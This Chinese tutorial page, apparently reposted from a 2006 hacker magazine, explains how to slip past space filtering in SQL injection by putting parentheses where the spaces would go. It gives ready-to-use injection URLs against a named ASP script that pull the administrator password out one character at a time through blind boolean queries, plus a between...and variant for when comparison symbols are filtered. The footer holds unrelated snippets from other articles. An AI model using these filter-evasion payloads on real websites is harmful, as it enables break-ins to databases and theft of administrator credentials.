突破空格的限制

2016-02-19 11:11 6 1 收藏

关注图老师设计创意栏目可以让大家能更好的了解电脑,知道有关于电脑的更多有趣教程,今天给大家分享突破空格的限制教程,希望对大家能有一点小小的帮助。

【 tulaoshi.com - Web开发 】

关于空格,有许多替换方式,比如TAB空格,SQL数据库中的/**/,但我又找到了另一种替换方式,已发表于《黑客手册》2006.7期中,这里挑其精华,现一下吧!

对于SQL语句,大家还都习惯于其的空格,比如select id from [name],如果中间没有了空格,那就成了selectidfrom[name], 一滩糊涂!除了上面所说到几个空格的替代方法外,我发现用()括号在SQL中一样可以运行,比如上面的语句,就可以写成,select(id)from[name],有括号分隔,可以正常执行。
举个例 子说一下,我们得到一个注入点:jmdcw.asp?name=aa'and 1=1 and ''=',如果替换其中的1=1为查询管理员的密码的语句:(select asc(mid(pass,1,1)) from [name] where id=1)49。如何用空格呢?其实可以写成这样的:
jmdcw.asp?name=aa'and((select(asc(mid(pass,1,1)))from[name]where(id=1))49)and''='
如果屏蔽了和符号,则用between…and…,语句是:
jmdcw.asp?name=aa'and((select(asc(mid(pass,1,1)))from[name]where(id=1))between(40)and(50))and''='

对于中间应该出现空格的地方,用()进行替换,不过,对于很复杂的SQL语句就不太好用了。上面说到的是字符型的,如果是数值型,可以在id=1后加一个括号,不过这个我没有测试,比如:jmdcw.asp?id=(1)and(select.....),应该是可行的吧?

呵呵,总结一下,和LOVESHELL上的朋友分享一下。 

来源:http://www.tulaoshi.com/n/20160219/1596697.html

延伸阅读
标签: 聊天软件
  大家都知道非会员QQ的网络硬盘的共享人数是不能超过5个的。 要想突破这个限制,你可以升级为QQ会员。 不想出钱??可以!其实很简单—— 首先,在任意一个你要共享给别人的文件夹里面(比如“我的文档”)建个叫“ABC”(其实叫什么都无所谓)的文件夹。 然后,把你要和别人共享的文件上传到“ABC”文件夹下。 ...
《僵尸必须死》教你如何突破15级的限制 会员:1398063787 分享 非原创 以防万一,修改前请备份吧!!! 文件位置:\All Zombies Must Die!\Bzb2Game\Config\DefaultGame.ini 打开,搜索levelcap=15   需要注意的是第一个搜索出来的结果前面有注释: ;----------------------------------------------------------------- VALUES...
标签: 微信转账
教你微信转账突破20万/年限制 首先给大家分享一下,怎么进行微信转账,主要有两种方法: 1.在微信最新版本中,点击右上角菜单栏中“我的钱包”,然后再找这里面可以看到“转账”的标签,点击“转账”,出现一个好友通讯录,你就可以选择自己想转账的人。输入转账金额。点击“转账”就能成功,但是注意,如果对方不是最新版本,那么可...
标签: Web开发
先来看一段正常的canvas画图语法: 代码如下: ctx.arc(centerX,centerY,radius,0,PI*2,true); ctx.shadowColor = 'rgba(0,0,0,0.5)'; ctx.shadowBlur = "10"; ctx.fill(); ctx.beginPath(); ctx.shadowColor = 'rgba(0,0,0,0)'; ctx.moveTo(centerX-radius,centerY); ctx.lineTo(centerX-radius,centerY - 50); ctx.lineTo(centerX+radius,ce...
全局参数:Private Rv_data() As Byte '存放接收的数据Private tmpRV() As Byte '存放暂存的数据Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long) Form_Load ()中先初始化控件参数With MSComm1.Settings = "9600,N,8,1".InputMode = 1 '设置接受数据的类型是二进制类型数据.InputLen = 8 '一次...

经验教程

189

收藏

21
微博分享 QQ分享 QQ空间 手机页面 收藏网站 回到头部